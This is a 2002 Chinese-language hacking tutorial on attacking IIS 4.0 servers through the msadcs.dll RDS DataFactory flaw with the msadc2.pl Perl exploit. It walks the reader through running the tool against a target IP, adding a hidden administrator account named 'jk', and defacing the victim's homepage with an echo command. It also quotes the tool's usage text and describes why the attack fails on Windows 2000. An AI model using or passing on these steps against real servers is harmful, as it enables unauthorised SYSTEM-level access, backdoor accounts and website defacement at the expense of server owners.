| |
|
msadcs.dll漏洞的使用方法 如果你确认对方的系统为NT4.0,你可以去http://hoowa.tab.net.cn/ 的“调试与工具”中下载一个ActivePerl,再到流光中找到“MSADC2.PL”这个程序,开始:C:\Perl\BIN>perl MSADC2.PL -h 目标IP 成功后会出现cmd /c 你这时可以:cmd /c net user jk jkok /add , C:\Perl\BIN>perl MSADC2.PL -h 目标机 cmd /c net localgroup administrators jk /add ,这样就成功的加入了一个jk用户。 如果对方的系统为W2K,攻击会失败,相关信息如下: 在dos下运行c:\perl msadc2.pl -h 目标IP 时的确出现了cmd /c但接下来无论输入什么命令,都会出现 Step 1: Trying raw driver to btcustmr.mdb winnt -> c: d: e: f: g: h: winnt35 -> c: d: e: f: g: h: winnt351 -> c: d: e: f: g: h: win -> c: d: e: f: g: h: windows -> c: d: e: f: g: h: Step 2: Trying to make our own DSN... Making DSN: c: <<fail>> Step 3: Trying known DSNs.................. Step 4: Trying known .mdbs...................................................... ................................................................................ ................................................................................ ............................................ No luck, guess you'll have to use a real hack, eh? 第2步making DSN总是 fail 此漏洞的相关的资料如下: 名字:msadc 描述:IIS4.0的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下,它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。 利用程序为"msadc2.pl",我们看看它的help [quack@chat quack]$ perl msadc2.pl -h -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Usage: msadc.pl -h <host> { -d <delay> -X -v } -h <host> = host you want to scan (ip or domain) -d <seconds> = delay between calls, default 1 second -X = dump Index Server path table, if available -N = query VbBusObj for NetBIOS name -V = use VbBusObj instead of ActiveDataFactory -v = verbose -e = external dictionary file for step 5 -u <\\host\share\file> = use UNC file -w = Windows 95 instead of Windows NT -c = v1 compatibility (three step query) -s <number> = run only step <number> Or a -R will resume a (v2) command session [quack@chat quack]$ perl msadc2.pl -h www.targe.com -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Type the command line you want to run (cmd /c assumed): cmd /c 如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的: echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm |
| Copyright By「黑白网络工作室」2002 All Rights Reserve |